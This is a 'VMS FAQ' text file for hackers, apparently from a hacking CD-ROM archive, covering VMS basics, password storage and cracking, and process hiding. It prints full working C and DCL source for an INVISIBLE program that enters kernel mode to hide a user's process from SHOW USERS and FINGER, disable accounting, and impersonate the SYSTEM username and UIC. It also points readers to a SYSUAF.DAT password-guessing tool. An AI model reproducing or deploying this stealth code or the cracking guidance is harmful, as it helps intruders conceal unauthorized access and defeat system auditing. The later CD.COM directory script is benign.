home *** CD-ROM | disk | FTP | other *** search
/ Hacker's Arsenal - The Cutting Edge of Hacking / Hacker's Arsenal - The Cutting Edge of Hacking.iso / texts / VMSFAQ.txt < prev    next >
Text File  |  2001-07-11  |  58KB  |  1,743 lines

  1.   [This is a very premature release,  but I wanted to go ahead and get it out]
  2.  
  3.  
  4.  
  5.  
  6.  
  7.           - VMS FAQ (Frequently Ask Questions) -
  8.  
  9.               - Beta 0.01 Release -
  10.  
  11.  
  12. Introduction:
  13.  
  14.     This article contain the answers to some frequently asked question
  15.     (Hence,  the name FAQ) about hacking the VMS operating system. 
  16.  
  17.     The article may be freely redistributed in its entirety provide
  18.     that credits are not altered or removed.   It may not be 
  19.     sold for profit or incorporated in commercial documents without
  20.     the written permission of the author(s). 
  21.  
  22.     This is the beta release of this article,   which means,  
  23.     the article is still in the working,  and is not complete. 
  24.     
  25.     Submissions,  corrections,  comments,  input,  complaints, 
  26.     bomb threats,   cash,  etc.,  should be directed toward
  27.     The Beaver (beaver@upperdck.blkbox.com). 
  28.  
  29.  
  30. Index ---:
  31.  
  32. More Common Newbie Questions:
  33.  
  34. 1.  VMS Basic information ("What does VMS run on?")
  35. 2.  Password storage information (SYSUAF.DAT) ("Where the hell is the 
  36.     /etc/passwd file??!?!?!")
  37. 3.  Cracking the SYSUAF.DAT ("Is there a version of 'Crack' for VMS
  38.     machines?")
  39. 4.  Becoming invisible in VMS ("Is there a 'Cloak' routine in VMS?")
  40. 5.  SET DEFAULT command ("How the do I change damn directory's?")
  41. 6.  The infamous "CD" .COM file ("I hate this SET DEFAULT crap") 
  42. 7.  LOGIN.COM ("Okay,  where's my .profile???").
  43. 8.  Captive Accounts ("I can't get to DCL"). 
  44.  
  45. VMS Mail Hack Routines:
  46.  
  47. 1.  Fake Mail ("How do I send fake mail to VMS machines?")
  48. 2.  Unix/VMS Sendmail holes ("Will my sendmail holes work on VMS?")
  49. 3.  Mail Bomb ("I need to mailbomb a user from my VMS account,  how?)
  50.  
  51. User/Image Privilege Information:
  52.  
  53. 1.  Systems Privileges, Listing and explanation ("How are Priv's setup?")
  54. 2.  Creating privileged imagines ("Can I create a SUID Shell on a VMS box?")
  55.  
  56. DECNetwork Information.
  57.  
  58. 1.  Brief Description of a DECNet ("What's a DECNet?")
  59. 2.  What it means to you ("What can it do for me?")
  60. 3.  Obtaining files/system info/etc ("How do I get information for the remote?")
  61. 4.  Using remote nodes ("How do I connect interactively?")
  62. 5.  Getting node lists ("How do I find connectable nodes?")
  63. 6.  Proxy Logins ("Can't DECNet nodes be protected?")
  64. 7.  Proxy Logs ("Are Proxy logins logged? Can I use it to break into nodes?") 
  65.  
  66. TCP/IP Connected VMS Machines. 
  67.  
  68. 1.  Obtaining remote usernames without "FINGER" ("How do I get usernames
  69.     if FINGER is disabled")
  70. 2.  Changing the image running in FINGER ("How do I link a command name to
  71.     another so it appears I am running a different image?")
  72.  
  73.  
  74.         -      More Common Newbie Questions      -
  75.  
  76.  
  77. 1.      "What does VMS run on?"
  78.  
  79.     VMS (Virtual Memory System) runs on Digital Equipment Corp. 
  80.     (DEC - pronounced,  "DECK") VAX (Virtual Address eXtension)
  81.     and the newer Alpha's.   The user uses DCL (DEC Command
  82.     Language) to interact with the computer.  These commands
  83.     and there syntax are completely different then those of
  84.     Unix and Unix-like operating systems,  thus a completely
  85.     different mindset is often required (this is the authors
  86.     opinion). 
  87.  
  88. 2.     "Why A 'VMS-Hacking FAQ'?"
  89.  
  90.     Several reasons.    Once and a while,   A escape from Unix is
  91.     very,  very nice.   Another reason is that is art of 
  92.     VMS hacking has since vanished,  and its replacement are
  93.     statements like,  "Hacking VMS is impossible", "VMS is
  94.     to cryptic to use",  and as always,  "Man,  VMS sucks". 
  95.  
  96.     These are generally statements by people who know almost 
  97.     zero about VMS.   I don't want to go into a "which OS is
  98.     better",  because that would defeat the purpose of this 
  99.     file",  but in my personal opinion,   both OS's have 
  100.     there advantages/disadvantages. 
  101.  
  102.     I have,  however,  written this FAQ with a Unix overtone
  103.     to it,  to help the reader understand what is trying to
  104.     be accomplished in some examples. 
  105.  
  106. 3.    "Where in the hell is the passwd file???!?!?!"
  107.  
  108.     There is no /etc/passwd file.  All user information is kept in
  109.     a file called SYSUAF.DAT,  which is stored in the directory
  110.     (or actual the logical) SYS$COMMON.   This file is usually
  111.     not readable by "normal" users. 
  112.  
  113. 4.    "Is there a version of "Crack" that I can run on a VMS machine?"
  114.     
  115.     The unix program, "Crack" will not work,  but there are password
  116.     guessing routines available.
  117.     
  118.     The best on I have seen is "GUESS_PASSWORD.EXE",  which can be
  119.     obtained from the following sites.
  120.  
  121.     ftp.wku.edu:/vms/fileserv/uaf.zip
  122.     ftp.spc.edu:/macro32/savesets/uaf.zip
  123.  
  124.     In order for the routine to work,  you need access to the
  125.     SYSUAF.DAT.  This version works on both OpenVMS VAX and 
  126.     OpenVMS AXP
  127.  
  128. 5.    "Can I 'Cloak' in routine in VMS?"
  129.  
  130.     Yes.  Below is the code needed to make your process invisible
  131.     to "FINGER",  "SHOW USERS",  etc...
  132.  
  133.     First,  create the following file:
  134.  
  135. Name: BUILD_INVISIBLE.COM
  136. ---------------------------------[Cut Here]-----------------------------------
  137. $ save_verify = 'f$verify(0)'
  138. $ system = "vax"    !Set to "alpha" for Alpha
  139. $!
  140. $!  File to build Ehud Gavron's INVISIBLE
  141. $!
  142. $!  Author:    Hunter Goatley
  143. $!
  144. $ say := write sys$output
  145. $ on error then goto common_exit
  146. $ on contrl_y then goto common_exit
  147. $ say "Extracting $JIBDEF and $PCBDEF from LIB.MLB...."
  148. $ library/macro/extr=$JIBDEF/out=jibdef.mar sys$library:lib.mlb
  149. $ library/macro/extr=$PCBDEF/out=pcbdef.mar sys$library:lib.mlb
  150. $ say "Converting $*DEF macros to C .H files...."
  151. $ call convert_to_h jibdef.mar
  152. $ call convert_to_h pcbdef.mar
  153. $ say "Compiling INVISIBLE...."
  154. $ cc invisible
  155. $ say "Linking INVISIBLE...."
  156. $ link/notrace invisible,invisible.opt_'system'/opt
  157. $ say "INVISIBLE build completed"
  158. $ common_exit:
  159. $    exit f$verify(save_verify).or.1
  160. $ convert_to_h: subroutine
  161. $ name = f$parse(p1,"","","NAME")
  162. $ open/read tmp 'p1'
  163. $ create 'name'.H
  164. $ open/append tmph 'name'.H
  165. $ cvt_loop:
  166. $    read/error=cvt_fin tmp line
  167. $    if f$extract(0,4,line).nes."$EQU" then goto cvt_loop
  168. $    write tmph "#define ",f$extract(4,255,line)
  169. $    goto cvt_loop
  170. $ cvt_fin:
  171. $    close tmp
  172. $    close tmph
  173. $ write sys$output "C header file ''name'.H created"
  174. $ exit
  175. $ endsubroutine
  176. -------------------------------[End Of File]-----------------------------------
  177.  
  178.     Next is the C Code for the "INVISIBLE" routine....
  179.  
  180.  
  181. Name:  INVISIBLE.C
  182. ---------------------------------[Cut Here]------------------------------------
  183. /*
  184.  * Invisible    - Make a process invisible and visible again.  Originally
  185.  *          written in MACRO32.  Now in C so it runs on Alpha too.
  186.  *
  187.  *
  188.  *    Option file invisible.opt:
  189.  *        ALPHA:    sys$loadable_images:sys$base_image.exe/share
  190.  *
  191.  *        VAX:    sys$system:sys.stb/selective_search
  192.  *
  193.  *
  194.  *    Build:
  195.  *        $ cc invisible
  196.  *        $ link invisible,invisible/opt
  197.  *
  198.  *    Usage:
  199.  *        $ run invisible
  200.  *
  201.  *
  202.  *  Ehud Gavron
  203.  *  ACES Consulting Inc.
  204.  *  Gavron@ACES.COM
  205.  *
  206.  *    14-Oct-1992    Ehud Gavron    Ported to C, Alpha, ANSI, and 
  207.  *                    everything else.
  208.  *
  209.  */
  210.  
  211. #define module_name INVISIBLE
  212. #define module_version "V1.0.0"
  213.  
  214. #ifdef __alpha
  215. #pragma module module_name module_version
  216. #else /* __vax */
  217. #module module_name module_version
  218. #endif /* __alpha */
  219.  
  220. #ifndef __alpha
  221. #define sys$gl_ijobcnt sys$gw_ijobcnt
  222. #endif
  223.  
  224. #include <descrip.h>
  225. #include "jibdef.h"    /* Extracted from LIB.MLB and massaged into C form */
  226. #include "pcbdef.h"    /* Extracted from LIB.MLB and massaged into C form */
  227. #include <ssdef.h>
  228. #include <jpidef.h>
  229. #include <psldef.h>
  230. #include <lnmdef.h>
  231. typedef union {
  232.     struct {
  233.         short s_buflen;
  234.         short s_itemcode;
  235.         char *s_bufaddr;
  236.         int *s_retlen;
  237.         } s;
  238.     unsigned long end;
  239.     } ITEMLIST;
  240.  
  241. #define    buflen        s.s_buflen
  242. #define    itemcode    s.s_itemcode
  243. #define    bufaddr        s.s_bufaddr
  244. #define    retlen        s.s_retlen
  245.  
  246. struct ISB {
  247.     int    l_uic;
  248.     int    l_namelen;
  249. #ifdef __alpha
  250.     int    l_jobtype;
  251. #else
  252.     char    b_jobtype;
  253. #endif
  254.     char    b_terminal;
  255.     char    t_lname[PCB$S_LNAME + 1];
  256.     char    t_username[JIB$S_USERNAME + 1];
  257.     };
  258.  
  259. struct ISB isb;
  260. static int lnm_retlen;
  261.  
  262. ITEMLIST lnm_itmlst[2];
  263. ITEMLIST jpi_itmlst[2];
  264. struct dsc$descriptor_s prcnam_desc;
  265. struct dsc$descriptor_s prcnam;
  266. $DESCRIPTOR(lnm_tabnam,"LNM$PROCESS_TABLE");
  267. $DESCRIPTOR(lnm_lognam,"ISB");
  268. $DESCRIPTOR(fao_prcnam,"SYMBIONT_!UL");
  269. int sysuic = 0x00010004;
  270. char sysusername[] = "SYSTEM        ";
  271. char namebuf[PCB$S_LNAME];
  272.  
  273. #ifdef __alpha
  274. main()
  275. #else
  276. cmain()
  277. #endif
  278. {
  279.     int sys$cmkrnl(),sys$exit(),invisible_k();
  280.     int ss_stat;
  281.  
  282.     lnm_itmlst[0].buflen = sizeof(isb);
  283.     lnm_itmlst[0].itemcode = LNM$_STRING;
  284.     lnm_itmlst[0].bufaddr = (char *)&isb;
  285.     lnm_itmlst[0].retlen = &lnm_retlen;
  286.     lnm_itmlst[1].end = 0;
  287.     
  288.     jpi_itmlst[0].buflen = PCB$S_LNAME;
  289.     jpi_itmlst[0].itemcode = JPI$_PRCNAM;
  290.     jpi_itmlst[0].bufaddr = (char *)&isb.t_lname;
  291.     jpi_itmlst[0].retlen = (int *)&isb.l_namelen;
  292.     jpi_itmlst[1].end = 0;
  293.     
  294.     prcnam_desc.dsc$a_pointer = (char *)&isb.t_lname;
  295.     prcnam_desc.dsc$w_length = PCB$S_LNAME;
  296.     prcnam_desc.dsc$b_dtype = DSC$K_DTYPE_T;
  297.     prcnam_desc.dsc$b_class = DSC$K_CLASS_S;
  298.     
  299.     prcnam.dsc$a_pointer = (char *)&namebuf;
  300.     prcnam.dsc$w_length = PCB$S_LNAME;
  301.     prcnam.dsc$b_dtype = DSC$K_DTYPE_T;
  302.     prcnam.dsc$b_class = DSC$K_CLASS_S;
  303.     
  304.     ss_stat = sys$cmkrnl(invisible_k,0);
  305.     (void) sys$exit(ss_stat);    
  306. }
  307.  
  308. int invisible_k()
  309. {
  310.     int sys$getjpiw(),sys$crelnm(),sys$fao(),sys$setprn();
  311.     int strncpy(),sys$exit(),sys$trnlnm(),sys$dellnm();
  312.     int *a_long;
  313.     int acmode = PSL$C_KERNEL;
  314.  
  315. #pragma nostandard            /* Oh well */
  316.     globalref ctl$gl_pcb;
  317.     globalref sys$gl_ijobcnt;
  318. #pragma standard
  319.  
  320.     int ss_stat;
  321.     char *pcb;
  322.     char *jib;
  323.     long *sts;
  324.     long *own;
  325.     char *p;
  326.     long *q;
  327.     int loop = 0;
  328.  
  329.     pcb = (char *)ctl$gl_pcb;
  330.  
  331.     if (pcb == 0) {
  332.        return(0);
  333.        }
  334.     q = (long *)((char *)pcb + PCB$L_JIB);
  335.     jib =(char *)  *q;
  336.  
  337.     sts = (long *)((char *)pcb + PCB$L_STS);
  338.  
  339.     if (*sts & PCB$M_INTER) {    /* Do stealth mode */
  340.        *sts = *sts^PCB$M_INTER;
  341.        *sts = *sts|PCB$M_NOACNT;
  342.        
  343.        own = (long *)((char *)pcb + PCB$L_OWNER);
  344.        if (*own == 0) {  /* We are not a subprocess  */
  345.           sys$gl_ijobcnt--;
  346.           }
  347.  
  348.        p = (char *)pcb + PCB$T_TERMINAL;
  349.        isb.b_terminal = *p;
  350.        *p = '\0'; 
  351.     
  352.  
  353. #ifdef __alpha
  354.        q = (long *)((char *)jib + JIB$L_JOBTYPE);
  355.        isb.l_jobtype = *q;
  356.        *q = 0;
  357. #else
  358.        p = (char *)jib + JIB$B_JOBTYPE;
  359.        isb.b_jobtype = *p;
  360.        *p = '\0';
  361. #endif
  362.        strncpy((char *)&isb.t_username,
  363.            (char *)(jib + JIB$T_USERNAME),
  364.            JIB$S_USERNAME);
  365.  
  366.        strncpy((char *)(jib + JIB$T_USERNAME),
  367.            (char *)&sysusername,
  368.            JIB$S_USERNAME);
  369.  
  370.        q = (long *)((char *)pcb + PCB$L_UIC);
  371.        isb.l_uic = *q;
  372.        *q = sysuic;
  373.  
  374.        ss_stat = sys$getjpiw(0,0,0,&jpi_itmlst,0,0,0);
  375.        if (!(ss_stat & 1)) return(ss_stat);
  376.        ss_stat = sys$crelnm(0,
  377.                 &lnm_tabnam,
  378.                 &lnm_lognam,
  379.                 &acmode,
  380.                 &lnm_itmlst);
  381.        if (!(ss_stat & 1)) return(ss_stat);
  382.        do {
  383.           loop++;
  384.           prcnam.dsc$w_length = PCB$S_LNAME;
  385.           ss_stat = sys$fao((char *)&fao_prcnam,
  386.                     (char *)&prcnam.dsc$w_length,
  387.                 (char *)&prcnam,
  388.                 loop);
  389.           if (!(ss_stat &1)) return(ss_stat);
  390.           ss_stat = sys$setprn((char*)&prcnam);
  391.           } while (ss_stat == SS$_DUPLNAM);         
  392.        return(SS$_NORMAL);
  393.        }
  394.     else {    /* unstealth */
  395.        ss_stat = sys$trnlnm(0,
  396.                 &lnm_tabnam,
  397.                 &lnm_lognam,
  398.                 &acmode,
  399.                 &lnm_itmlst);
  400.        if (!(ss_stat & 1)) return(ss_stat);
  401.        
  402.        ss_stat = sys$dellnm(&lnm_tabnam,
  403.                 &lnm_lognam,
  404.                 &acmode);
  405.        if (!(ss_stat & 1)) return(ss_stat);
  406.  
  407.        *sts = *sts|PCB$M_INTER;
  408.            *sts = *sts^PCB$M_NOACNT;
  409.  
  410.        own = (long *)((char *)pcb + PCB$L_OWNER);
  411.        if (*own == 0) {  /* We are not a subprocess  */
  412.           sys$gl_ijobcnt++;
  413.           }
  414.  
  415.        q = (long *)((char *)pcb + PCB$L_UIC);
  416.        *q = isb.l_uic;
  417.  
  418.        p = (char *)pcb + PCB$T_TERMINAL;
  419.        *p = isb.b_terminal;
  420.     
  421. #ifdef __alpha
  422.        q = (long *)((char *)jib + JIB$L_JOBTYPE);
  423.        *q = isb.l_jobtype;
  424. #else
  425.        p = (char *)jib + JIB$B_JOBTYPE;
  426.        *p = isb.b_jobtype;
  427. #endif
  428.        strncpy((char *)(jib + JIB$T_USERNAME),
  429.            (char *)&isb.t_username,
  430.            JIB$S_USERNAME);
  431.  
  432.        prcnam_desc.dsc$w_length = (short)isb.l_namelen;
  433.        ss_stat = sys$setprn(&prcnam_desc);
  434.        return;
  435.     }
  436. }
  437.  
  438. #ifndef __alpha
  439. int strncpy(a,b,c)
  440. char *a,*b;
  441. int c;
  442. {
  443.     for (; c > 0; c--) {
  444.       *a++ = *b++;
  445.       }
  446. }
  447. #endif
  448. --------------------------------[End Of File]----------------------------------
  449.  
  450.     After these files are created,   type in the following at your
  451.     DCL prompt:
  452.  
  453. $ @build_invisible     ! This will build our INVISIBLE.EXE routine.
  454. $ run invisible        ! One the build is complete. 
  455.  
  456.     You should be completely "cloaked".
  457.  
  458.     To obtain full source, readme files,  etc,  you can obtain this
  459.     program from:
  460.  
  461.     ftp.wku.edu:/vms/fileserv/invisible.zip
  462.     ftp.spc.edu:/macro32/savesets/invisible.zip
  463.  
  464. 4.     "How do I change damn directory's?". 
  465.  
  466.     This is done via the "SET DEFAULT" command.  In the following 
  467.     format:
  468.  
  469. $ SET DEFAULT device:[directory]
  470.  
  471.  
  472.     VMS uses a standard hierarchy system,  in which devices and 
  473.     directory's are separated.  For example,  our home device/directory 
  474.     might be:
  475.  
  476.     DISK3:[USR.JOEHACKER]
  477.  
  478.     DISK3:  would represent the device that we are on/using
  479.     while,  [USR.JOEHACKER] would signify the actual directory
  480.     on that device that we are using.  So,  to change directory's, 
  481.     we could type:
  482.  
  483. $ SET DEFAULT [USR.BOB]
  484.  
  485.     If [USR.BOB] is a existing directory,  this would now be our
  486.     current path (and we would still be located on the DISK3: 
  487.     device.  If we wanted to simply back out one level (to the 
  488.     [USR]) on that device,  we would issue the following command:
  489.  
  490. $ SET DEFAULT [-]
  491.  
  492.     The "[-]" signifies one directory back.  So if our path is,
  493.     [USR.BOB.HACKING.VMS.PROGRAMS],  and we want to get to the 
  494.     [USR.BOB] directory,  instead of typing the entire path 
  495.     again,  we could simply type:
  496.  
  497. $ SET DEFAULT [---]
  498.  
  499.     "[---]" means,  back out three levels of the hierarchy. 
  500.  
  501.     There can be several devices on one VMS system (Device names
  502.     can be obtained via a "SHOW DEVICES").  While your 
  503.     home directory might be on DISK3,   another users could
  504.     be on device DISK2.   To switch devices, we can add in
  505.     the device name,  followed by the directory (if needed). 
  506.     So,  if you need to get to a users who stores information
  507.     in the DISK2:[REALLY.SECRET.STUFF] directory,  you could
  508.     type the following DCL command:
  509.  
  510. $ SET DEFAULT DISK2:[REALLY.SECRET.STUFF]
  511.  
  512.     Or if we are currently in the "DISK3:[REALLY]" and we want
  513.     to get to the information in the "DISK2:[REALLY]" directory,
  514.     we could simply type 
  515.  
  516. $ SET DEFAULT DISK2:
  517.  
  518.     And the rest would be carried over. 
  519.  
  520.     In the event that you need to get to the top of the hierarchy
  521.     (Unix equivelant:  "cd /"),  SET DEFAULT (to any disk structured
  522.     device) to "[000000]".  For example,  to get to the very
  523.     top of the hierarchy on device DISK2,  you would type. 
  524.  
  525. $ SET DEFAULT DISK2:[000000]
  526.  
  527.     VMS will also allow you to SET DEFAULT to a directory that does
  528.     not exist.  When this happens,  the operating system will 
  529.     inform you of this when you try to issue a command that requires
  530.     some sort of file I/O.   If at any point you get completely 
  531.     lost,  you can return to your "home" directory by typing
  532.  
  533. $ SET DEFAULT SYS$LOGIN:
  534.  
  535.  
  536. 6.    "I hate this SET DEFAULT crap.  Can I just use 'cd' command like
  537.      I do in Unix?". 
  538.  
  539.     By default,  no.  There are two things that you can do. 
  540.     One,  add the following line to your "LOGIN.COM" (see
  541.     where my .profile in VMS' for more information)
  542.  
  543.  
  544. $ CD :== SET DEFAULT     ! I am hate typing that long "SET DEF" command
  545.  
  546.     Or you can us the following .COM file,  which will guarrent
  547.     that you eat as many resources as you can......
  548.  
  549.           [Taken from Phrack,  Vol. 2.  Issue 19.,  File 2]
  550.                    [ Coded By The Mentor ]
  551.                       
  552.                           Code for CD.COM
  553.                                >>>>>>>>>>>>>>>
  554.  
  555. $! CD.COM v6.09
  556. $! The Ultimate Change Directory Command.
  557. $!
  558. $  hdir     = f$trnlnm("SYS$LOGIN")                 ! Home Directory
  559. $  ndir     = f$edit(p1,"UPCASE")                   ! New  Directory
  560. $  odir     = f$environment("DEFAULT")              ! Old  Directory
  561. $  prompton = (f$edit(f$trnlnm("SYS$PROMPT"),"UPCASE") .eqs. "ON")
  562. $!
  563. $  if (ndir .eqs. "")           then goto DISPLAY   ! No Dir
  564. $  if (ndir .eqs. "*")          then goto DIRSEARCH ! Search for Dirs
  565. $  if (ndir .eqs. "?")          then goto HELP      ! Instructions
  566. $!
  567. $  PARSE:
  568. $  length   = f$length(ndir)                        ! Fix up ndir
  569. $  if (f$location("@",ndir) .eq. 0) .or. -
  570.       (f$location("$",ndir) .eq. 0) then ndir = f$extract(1, length - 1, ndir)
  571. $  right    = f$location("]",ndir) + 1
  572. $  if (right .gt. length) then right = f$location(">", ndir)
  573. $  if (right .le. length) then ndir  = f$extract(0, right, ndir)
  574. $!
  575. $  if (f$trnlnm(ndir) .eqs. "") then goto CASESYM   ! Not Logical Name
  576. $     ndir   = f$trnlnm(ndir)                       ! Logical Name
  577. $     goto PARSE
  578. $!
  579. $  CASESYM:
  580. $  if ("''&ndir'" .eqs. "")     then goto CASE0     ! Not Symbol
  581. $     ndir = 'ndir'                                 ! Symbol
  582. $     goto PARSE
  583. $!
  584. $  CASE0:
  585. $  len_ndir = f$length(ndir)                        ! Regular Dir
  586. $  if (f$location("[", ndir) .lt. len_ndir) .or. -
  587.       (f$location("<", ndir) .lt. len_ndir) then goto SETDIR
  588. $!
  589. $  CASE1:                                           ! Home Dir
  590. $  if ((ndir .nes. "HOME") .and. (ndir .nes. "\")) then goto CASE2
  591. $     ndir = hdir
  592. $     goto SETDIR
  593. $!
  594. $  CASE2:                                           ! . .. .dir
  595. $  if (f$location(".", ndir) .nes. 0) then goto CASE3
  596. $     if (ndir .eqs. "..") then ndir = "-"
  597. $     if (f$extract(0, 2, ndir) .eqs. "..") -
  598.          then ndir = "-" + f$extract(1, len_ndir - 1, ndir)
  599. $     ndir = "[" + ndir + "]"
  600. $     if (ndir .eqs. "[.]") then ndir = odir
  601. $     goto SETDIR
  602. $!
  603. $  CASE3:                                           ! :
  604. $  if (f$location(":", ndir) .ge. len_ndir) then goto CASE4
  605. $     left    = f$location(":", ndir) + 1
  606. $     symbol  = f$extract(left, 1, ndir)
  607. $     if (symbol .eqs. ":")  then goto CASE3B       ! :: Node
  608. $     if ((symbol .eqs. "[") .or. (symbol .eqs. "<")) then goto SETDIR
  609. $        ndir = f$extract(0, left, ndir) + "[" -
  610.               + f$extract(left, len_ndir - left+1, ndir) + "]"
  611. $     goto SETDIR
  612. $!
  613. $  CASE3B:                                          ! NODE::nothing
  614. $  if (f$length(ndir)-1 .gt. left) then goto CASE3C
  615. $     ndir = ndir + "[000000]"
  616. $     goto SETDIR
  617. $!
  618. $  CASE3C:                                          ! NODE::directory
  619. $  if ((f$location("[", ndir) - f$location("<", ndir)) .ne. 0) -
  620.       then goto SETDIR
  621. $
  622. $     ndir = f$parse(ndir,,,"NODE") + "[" + f$parse(ndir,,,"NAME") + "]"
  623. $     goto SETDIR
  624. $!
  625. $  CASE4:                                           ! dir
  626. $  ndir = "[" + ndir + "]"
  627. $!
  628. $  SETDIR:
  629. $  set default 'ndir'
  630. $  if (f$parse("") .eqs. "") then goto DIRERROR
  631. $!
  632. $  DISPLAY:
  633. $  if ((ndir .nes. "") .and. prompton) then goto NODISPLAY
  634. $     hnode = f$getsyi("NODENAME")
  635. $     cnode = f$parse(f$trnlnm("SYS$DISK"),,,"NODE") - "::"
  636. $     if (cnode .eqs. "") then cnode = hnode
  637. $     cdir  = f$environment("DEFAULT")
  638. $     write sys$output " "
  639. $     write sys$output "          Home Node: ", hnode
  640. $     write sys$output "     Home Directory: ", hdir
  641. $     if (cdir .eqs. hdir) .and. (cnode .eqs. hnode) then goto DISPSKIP
  642. $     write sys$output "       Current Node: ", cnode
  643. $     write sys$output "  Current Directory: ", cdir
  644. $  DISPSKIP:
  645. $     write sys$output " "
  646. $!
  647. $  NODISPLAY:
  648. $  ndir = f$environment("DEFAULT")
  649. $  if .not. prompton then goto END
  650. $!
  651. $  if (f$length(ndir) .ge. 32) then goto TOOLONG
  652. $!
  653. $  SETPROMPT:
  654. $  set prompt = 'ndir'" "
  655. $!
  656. $  END:
  657. $  exit
  658. $!
  659. $  DIRERROR:
  660. $  write sys$output " "
  661. $  write sys$output "          ", ndir, " Directory does not exist!"
  662. $  write sys$output " "
  663. $  set default 'odir'
  664. $  ndir = odir
  665. $  goto NODISPLAY
  666. $!
  667. $! Prompt Problems------------------------------------------------------------
  668. $!
  669. $  TOOLONG:
  670. $! Prompt is too long. Get rid of everything to the left of [ or <. If that
  671. $! doesn't work, get rid of a subdirectory at a time.  As a last resort,
  672. $! set the prompt back to $.
  673. $!
  674. $  left     = f$location("[", ndir)
  675. $  len_ndir = f$length(ndir)
  676. $  if (left .ge. len_ndir) then left = f$location("<",ndir)
  677. $  if (left .gt. 0) .and. (left .lt. len_ndir) -
  678.       then ndir = f$extract(left, len_ndir - left, ndir)
  679. $!
  680. $  STILLTOOLONG:
  681. $    if (f$length(ndir) .lt. 32) then goto SETPROMPT
  682. $    left     = f$location(".", ndir) + 1
  683. $    len_ndir = f$length(ndir)
  684. $    if left .ge. len_ndir then ndir = "$ "
  685. $    if left .ne. len_ndir -
  686.         then ndir = "[*" + f$extract(left, len_ndir - left, ndir)
  687. $    goto STILLTOOLONG
  688. $!
  689. $! Wildcard Directory---------------------------------------------------------
  690. $!
  691. $  DIRSEARCH:
  692. $  error_message = f$environment("MESSAGE")
  693. $  on control_y then goto DIREND
  694. $  on control_c then goto DIREND
  695. $  set message/nosev/nofac/noid/notext
  696. $  write sys$output " "
  697. $  dispct = 1
  698. $  dirct  = 0
  699. $  pauseflag = 1
  700. $!
  701. $  DIRLOOP:
  702. $    userfile = f$search("*.dir")
  703. $    if (userfile .eqs. "") .and. (dirct .ne. 0) then goto DIRMENU
  704. $    if (userfile .eqs. "") then goto DIRNONE
  705. $    dispct = dispct + 1
  706. $    dirct  = dirct  + 1
  707. $    on severe then $ userprot = "No Priv"
  708. $    userprot = f$file_attributes(userfile,"PRO")
  709. $    if userprot .nes. "No Priv" then userprot = " "
  710. $    userfile'dirct' = "[." + f$parse(userfile,,,"NAME") + "]"
  711. $    userprot'dirct' = userprot
  712. $    lengthflag = (f$length(userfile'dirct') .gt. 18)
  713. $    if lengthflag then write sys$output -
  714.         f$fao("  !3SL   !34AS  ", dirct, userfile'dirct'), userprot'dirct'
  715. $    if (.not. lengthflag) then write sys$output -
  716.         f$fao("  !3SL   !20AS  ", dirct, userfile'dirct'), userprot'dirct'
  717. $    if (dispct .lt. 8) then goto DIRLOOP
  718. $    dirct  = dirct  + 1
  719. $    userfile'dirct' = ""
  720. $    dirct  = dirct  + 1
  721. $    userfile'dirct' = ""
  722. $    if pauseflag then goto DIRMENU
  723. $    dispct = 0
  724. $    goto DIRLOOP
  725. $!
  726. $  DIRMENU:
  727. $  write sys$output " "
  728. $  if (userfile .eqs. "") then goto DIRMENU2
  729. $     write sys$output "    M   More subdirectories"
  730. $  if pauseflag then -
  731. $     write sys$output "    N   More subdirectories/No pause"
  732. $!
  733. $  DIRMENU2:
  734. $     write sys$output "    R   Re-Display subdirectories"
  735. $     write sys$output "    Q   Quit (default)"
  736. $
  737. $  DIRINQUIRE:
  738. $  write sys$output " "
  739. $  inquire dirchoice "  Select One"
  740. $  write sys$output " "
  741. $!
  742. $  if (dirchoice .gt. 0)    .and. -
  743.       (dirchoice .le. dirct) then goto DIRCASEDIGIT
  744. $  dirchoice = f$edit(dirchoice,"UPCASE")
  745. $  if (dirchoice .eqs. "")  .or. -
  746.       (dirchoice .eqs. "Q")  then goto DIRCASEBLANK
  747. $  if (dirchoice .eqs. "M") .or. -
  748.       (dirchoice .eqs. "N")  then goto DIRCASEMORE
  749. $  if (dirchoice .eqs. "R")  then goto DIRCASERED
  750. $!
  751. $  DIRCASERROR:
  752. $  if (dirct .eq. 1)   then write sys$output -
  753.       "  Select 1 to change to the ", userfile1, " subdirectory. "
  754. $  revdirct = dirct
  755. $  if (dispct .eq. 8) then revdirct = revdirct - 2
  756. $  if (dirct .gt. 1)   then write sys$output -
  757.       "  Valid subdirectory selections are 1 through ", revdirct, " (Octal)."
  758. $  goto DIRINQUIRE
  759. $!
  760. $  DIRCASEDIGIT:
  761. $  if (userfile'dirchoice' .eqs. "") then goto DIRCASERROR
  762. $  ndir = userfile'dirchoice'
  763. $  goto DIREND
  764. $!
  765. $  DIRCASEBLANK:
  766. $  write sys$output "  Subdirectory not changed."
  767. $  write sys$output " "
  768. $  goto DIREND
  769. $!
  770. $  DIRCASEMORE:
  771. $  dispct = 0
  772. $  if (dirchoice .eqs. "N") then pauseflag = 0
  773. $  if (userfile .nes. "")   then goto DIRLOOP
  774. $  write sys$output "  No more subdirectories to display."
  775. $  goto DIRINQUIRE
  776. $!
  777. $  DIRCASERED:
  778. $  dispct = 1
  779. $  DISPLOOP:
  780. $     if (userfile'dispct' .eqs "") then goto DISPDONT
  781. $     lengthflag = (f$length(userfile'dispct') .gt. 18)
  782. $     if lengthflag then write sys$output -
  783.          f$fao("  !3SL   !34AS  ", dispct, userfile'dispct'), userprot'dispct'
  784. $     if (.not. lengthflag) then write sys$output -
  785.          f$fao("  !3SL   !20AS  ", dispct, userfile'dispct'), userprot'dispct'
  786. $     DISPDONT:
  787. $     dispct = dispct + 1
  788. $     if (dispct .le. dirct) then goto DISPLOOP
  789. $  goto DIRMENU
  790. $!
  791. $  DIRNONE:
  792. $  write sys$output "No subdirectories to choose, or no directory privileges."
  793. $  write sys$output " "
  794. $  goto DIREND
  795. $!
  796. $  DIREND:
  797. $  set message 'error_message'
  798. $  on control_y then exit
  799. $  on control_c then exit
  800. $  if (ndir .eqs. "*") then goto DISPLAY
  801. $  goto PARSE
  802. $!
  803. $!-Help-----------------------------------------------------------------------
  804. $!
  805. $  HELP:
  806. $  type sys$input
  807.  
  808.                CD.COM  Version 6  VMS Change Directory Command
  809.  
  810.                          Usage:  CD command/directory
  811.  
  812. CD         Display home directory,       CD ..       Change directory to the
  813.            current directory, node.      CD [-]      dir above current dir.
  814.  
  815. CD \       Change directory to your      CD ..sub    Change directory to a
  816. CD HOME    SYS$LOGIN directory.          CD [-.sub]  "sideways" subdirectory.
  817.  
  818. CD dir     Change directory to the       CD *        Display/select the
  819. CD [dir]   [dir] directory.                          available subdirectories.
  820.  
  821. CD .sub    Change directory to the       CD .        Reset current directory.
